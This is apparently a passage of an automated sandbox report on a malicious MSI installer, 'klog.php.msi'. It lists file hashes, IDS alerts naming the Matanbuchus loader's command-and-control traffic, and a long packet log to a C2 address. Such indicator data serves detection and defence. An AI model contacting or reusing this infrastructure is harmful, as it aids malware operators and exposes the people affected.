File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E648317-E941-449A-AF72-39AC6882CB87}, Number of Words: 10, Subject: ProSoftware, Author: Blueray INC, Name of Creating Application: ProSoftware, Template: ;1033, Comments: Set database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	6.982712024960584
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	klog.php.msi
File size:	978'944 bytes
MD5:	18d5f1a9bfb3e34ff25bbda3f05d386f
SHA1:	4b4394e1c8d91b4d7d1bec0c4a443fa08243994f
SHA256:	55a33165fba0f7134e4ca482e0951c143b04e6a0e78fdc5f702e74e08bfd9249
SHA512:	050747b91c89396a945e3a7e4bbe10f16ce2627d531db087ddef86817fbd9fd1c4e067d3cbb522380d2b1a5f50696797064a19e78dd5a8abc5a35c03dbe843fe
SSDEEP:	12288:xtu6QnN5MN+Y9x0ECIgYOx5fnL/tYi8OBZr7AicRXrdq3u8bJk:xtuxnNTY9x0ECIgYmfLVYeBZr7AM
TLSH:	4A25CF22338AC637C95E0270352A969B2568FDE7473180D7E3C92C1EEDB44D16A7DF92
File Content Preview:	........................>.......................................................D.......`......................................./...0..........................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T22:11:54.422793+0100	2034468	ET MALWARE Matanbuchus Loader CnC M3	1	192.168.2.4	49752	185.234.216.175	4443	TCP
2024-12-06T22:13:55.569892+0100	2034468	ET MALWARE Matanbuchus Loader CnC M3	1	192.168.2.4	50070	185.234.216.175	4443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:11:04.761770010 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:04.761821985 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:04.761909008 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:04.796540022 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:04.796595097 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.254000902 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.254075050 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:06.309106112 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:06.309154034 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.309448004 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.309499025 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:06.317297935 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:06.363332033 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.914295912 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.914328098 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.914400101 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:06.914400101 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:06.914455891 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:06.914508104 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.043879986 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.043908119 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.043963909 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.044002056 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.044020891 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.044043064 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.139040947 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.139065027 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.139182091 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.139228106 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.139868021 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.200376034 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.200403929 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.200541973 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.200582981 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.201776981 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.253176928 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.253207922 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.253281116 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.253313065 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.253328085 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.253355026 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.323844910 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.323873997 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.323932886 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.323964119 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.323980093 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.326420069 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.357404947 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.357434988 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.357506037 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.357517004 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.357547045 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.357562065 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.411642075 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.411670923 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.411727905 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.411758900 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.411773920 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.411798000 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.437872887 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.437901974 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.437952995 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.437990904 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.438003063 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.438555956 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.479497910 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.479536057 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.479568005 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.479612112 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.479630947 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.479698896 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.511013031 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.511040926 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.511125088 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.511152983 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.511869907 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.532347918 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.532366037 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.532424927 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.532444954 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.532469034 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.532480955 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.546471119 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.546489000 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.546551943 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.546566963 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.546603918 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.557770967 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.557785988 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.557866096 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.557881117 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.557964087 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.600817919 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.600833893 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.600892067 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.600908995 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.600951910 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.612149000 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.612164021 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.612216949 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.612245083 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.612256050 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.612272978 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.612289906 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.629072905 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.629087925 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.629141092 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.629194021 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.629209995 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.629292965 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.673696995 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.673719883 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.673764944 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.673832893 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.673856020 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.673871040 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.699801922 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.699817896 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.699879885 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.699934006 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.699985027 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.707204103 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.707220078 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.707281113 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.707292080 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.707340002 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.707389116 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.707472086 CET	49730	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.707489014 CET	443	49730	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.777242899 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.777309895 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:07.777384043 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.777663946 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:07.777679920 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:09.227092028 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:09.227160931 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:09.227868080 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:09.227878094 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:09.228110075 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:09.228113890 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:09.898113012 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:09.898147106 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:09.898260117 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:09.898293018 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:09.898330927 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.028235912 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.028260946 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.028362989 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.028402090 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.028443098 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.117047071 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.117073059 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.117173910 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.117204905 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.117244959 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.175245047 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.175271988 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.175363064 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.175389051 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.175426006 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.242959976 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.242980003 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.243041992 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.243079901 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.243098021 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.243124008 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.298156977 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.298177004 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.298221111 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.298245907 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.298260927 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.298358917 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.339214087 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.339243889 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.339291096 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.339335918 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.339354038 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.339479923 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.391149998 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.391170979 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.391222954 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.391262054 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.391275883 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.391302109 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.412309885 CET	49732	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.412354946 CET	443	49732	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.412431955 CET	49732	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.426573992 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.426604033 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.426673889 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.426703930 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.426734924 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.426744938 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.462649107 CET	49732	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.462672949 CET	443	49732	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.469938993 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.469965935 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.470047951 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.470047951 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.470062971 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.470102072 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.491096020 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.491115093 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.491203070 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.491219997 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.491358042 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.505646944 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.505673885 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.505732059 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.505748034 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.505796909 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.519177914 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.519198895 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.519243956 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.519260883 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.519272089 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.519296885 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.542591095 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.542613029 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.542665005 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.542689085 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.542707920 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.542735100 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.584777117 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.584800959 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.584849119 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.584886074 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.584904909 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.584927082 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.611804008 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.611835957 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.611886024 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.611912966 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.611927032 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.611946106 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.623672009 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.623692989 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.623764992 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.623786926 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.623836994 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.674055099 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.674078941 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.674127102 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.674150944 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.674164057 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.674191952 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.682059050 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.682075977 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.682132959 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.682147980 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.682193995 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.689194918 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.689210892 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.689270973 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.689285994 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.689326048 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.704956055 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.704972029 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.705035925 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.705049038 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.705089092 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.728430986 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.728452921 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.728507042 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.728527069 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.728554010 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.728585958 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.775150061 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.775171041 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.775244951 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.775270939 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.775324106 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.799776077 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.799794912 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.799901009 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.799928904 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.799981117 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.807157040 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.807172060 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.807256937 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.807262897 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.807306051 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.865860939 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.865894079 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.866023064 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.866060019 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.866106987 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.872627020 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.872648001 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.872757912 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.872781038 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.872833014 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.878618002 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.878633976 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.878676891 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.878690004 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.878710985 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.878735065 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.896758080 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.896775007 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.896850109 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.896872044 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.896917105 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.920670033 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.920695066 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.920739889 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.920773983 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.920785904 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.920814991 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.967205048 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.967227936 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.967323065 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.967369080 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.967418909 CET	49731	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:11:10.991192102 CET	443	49731	185.234.216.175	192.168.2.4
Dec 6, 2024 22:11:10.991208076 CET	443	49731	185.234.216.175	192.168.2.4
